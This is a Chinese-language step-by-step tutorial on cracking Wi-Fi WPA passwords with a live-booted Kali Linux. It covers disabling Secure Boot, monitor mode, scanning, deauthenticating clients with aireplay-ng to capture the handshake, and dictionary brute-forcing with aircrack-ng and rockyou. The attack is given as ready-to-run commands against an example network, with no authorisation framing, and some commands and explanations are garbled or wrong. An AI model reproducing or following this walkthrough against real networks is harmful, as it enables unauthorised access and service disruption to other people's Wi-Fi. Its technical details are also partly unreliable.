Kali Linux破解wifi密码(无须外置网卡)
环境准备:
方式一(选择该方式):Kali Linux、笔记本一台、U盘(至少8G)
方式二:Kali Linux、外置网卡、笔记本一台、VM
特别说明,主要是使用方式一进行破解,如果有外置网卡,那就非常简单了,直接通过vm外接网卡即可。注:制作kali启动镜像前,U盘里的数据一定要备份、备份、备份。
- balenaEtcher安装
该软件是用来制作镜像的工具,也可以使用其他的。不过不推荐,试过其他几款,还不如这个一键制作好用。
- 制作kali启动镜像
等待3-5分钟。注:在制作过程中,会弹出'初始化'的窗口,取消或者关闭就行,不要点击格式化,否则会让制作的镜像白费,需要重新来一次。
完成。
- 开机启动设置
(1). 进入bios界面
自己的电脑型号对应不同按键的启动bios方式不同,常用的笔记本型号的进入bios方式。如下图所示,其它型号的可自行百度往下看。(如,百度搜索'华硕笔记本进入bios按键')。
(2). 设置启动项的顺序
设置U盘启动项的顺序可自行百度,比较简单,这里不再叙述。
如果出现'Secure Boot Violation'等信息,那么我们就需要关闭笔记本的保护模式。方法大同小异,这是界面外观可能不一样,内容是一样的。当完成实验后,要把系统保护改回来。
[1]. 传统方式具体操作步骤往下看:
①. 进入Bios设定页面
②. security页面
进入[Security]页面(1),选择Secure Boot项目
③. 安全启动功能关闭
选择[Secure Boot Control]项目(3),并设定为Disabled。部分机种可能只有[Secure Boot]而没有[Secure Boot Control],则请选择[Secure Boot]并设定为[Disable]。
④. 保存设定并退出
进入[Save & Exit]页面(5),选择Save Changes and Exit后并选择Yes。
[2]. UEFI方式具体操作步骤往下看:
①. 进入BIOS设定页面后,使用快捷键[F7]、或是鼠标点选(1)进入进阶模式。
②. 进入[Security]页面,选择[Secure Boot]项目。
③. 安全启动功能关闭
选择[Secure Boot Control]项目(4),并设定为Disabled。部分机种可能只有[Secure Boot]而没有[Secure Boot Control],则请选择[Secure Boot]并设定为[Disable]。
④. 存储设定并退出
进入[Save & Exit]页面(6),选择Save Changes and Exit后并选择Yes。或者按F10保存
- 启动kali
注意:这一步一定不能马虎,一定要快速选择'kali live'模式,一定不能选择'install kali',也不能长时间不动,否则就等着重装系统、数据不见等一系列的问题。
- 无线wifi破解实验
(1). ifconfig
命令ifconfig查看网卡信息,有wlan0表示网卡能够用来破解wifi。
root@kali:~#ifconfig
(2). airmon-ng
使用命令airmon-ng start wlan0开启网卡监听模式。
root@kali:~#airmon-ng start wlan0
(3). iwconfig
使用iwconfig命令查看网卡信息,wlan0mon网卡名加了mon则表示'监听模式'开启成功。
root@kali:~#iwconfig
(4). airodump-ng扫描
使用命令airodump-ng wlan0mon,开始扫描WiFi,按ctrl+c结束任务。
root@kali:~#airodump-ng wlan0mon
参数 意义 BSSID wifi的MAC地址 PWR 信号强弱程度,数值越小信号越强 DATA 数据量,越大使用的人就越多 CH 信道频率(频道) ESSID wifi的名称,中文可能会有乱码
(5). 抓包
接着输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon。注,--bssid后面跟着的是'BSSID(MAC地址)',-c后面跟着的是'CH(信道)',-w后面跟着抓到的包保存到哪,最后是网卡信息'wlan0mon'。
如:我想要破解ESSID为TP-LINK_961A4A的无线wifi,格式为:
root@kali:~# airodump-ng --bssid 38:83:45:96:1A:4A -c -w /opt/catchWiFi wlan0mon
数据包已经正在抓取,等待一会,如果抓取不到数据。接着往下看
另起终端,输入格式为'airepaly-ng -0 0 -c STATION(任选其一) -a bssid 网卡名(一般为wlan0mon)'。不过STATION最好选择手机的热点,如果不清楚手机的mac地址那么可以任选其一,选择手机的好处是可以手动设置断线,让其抓取到包。如果运气不好,那么就试四个把。
如:我想要攻击STATION(MAC地址)为,格式为:
root@kali:~# aireplay-ng -0 0 -c 38:83:45:96:1A:4A -a 14:95:CE:BB:53:A8 wlan0mon
每个参数的意义
(0 WiFi设备无限次数,-0 8则攻击8次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码, 数据包里面的密码是哈希加密的,哈希加密只能正向)
当'airodump-ng --bssid BSSID'窗口出现WPA handshake时,表示抓包成功。这里有一个小技巧让其抓到包,让手机连接的wifi断开,然后重新连接wifi。简单说,把手机WiFi重新关开即可。
出现'WPA handshake时'时,需要让两个终端都按Ctrl+c停止,不然会一直断网的。
查看抓到的数据包.cd打开抓包的目录,ls列出来,就看到我们抓到的数据包
(6). 解压kali字典文件
解压kali自带的字典文件。路径:/usr/share/wordlists/rockyou.txt.gz
root@kali:~# gzip -d/usr/share/wordlists/rockyou.txt.gz
(7). 跑包(破解密码)
格式:aircrack-ng -w 字典路径 握手包路径,回车后开始爆破。
运气有一些差,抓到了三个cap包,一个没跑成功。但是怎么能放弃,毛主席说过,没有条件创造条件。如果抱着一定要跑出来的决心,就接着往下看。
root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-01.cap
root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-02.cap
root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-03.cap
方法,就是把我们正确的wifi密码加入到'密码字典(rockyou.txt)'中去。然后重新来一次,跑包。成功了。。。。。。。
添加'root123..'到rockyou密码字典中
root@kali:~# vim /usr/share/wordlists/rockyou.txt
root123..
特别说明:暴力破解并不简单,需要足够强大的字典和时间,可以通过字典生成工具生成自己的字典,字典越强大越容易破解。
其它密码字典:链接: 提取码:23fp
- 恢复保护系统
[1]. 传统方式'安全启动功能开启'具体操作步骤往下看:
选择[Secure Boot Control]项目(3),并设定为Disabled。部分机种可能只有[Secure Boot]而没有[Secure Boot Control],则请选择[Secure Boot]并设定为[Enabled]。
[2]. UEFI方式'安全启动功能开启'具体操作步骤往下看:
选择[Secure Boot Control]项目(4),并设定为Disabled。部分机种可能只有[Secure Boot]而没有[Secure Boot Control],则请选择[Secure Boot]并设定为[Enabled]。看右手有保存的提示,华硕的是F10保存。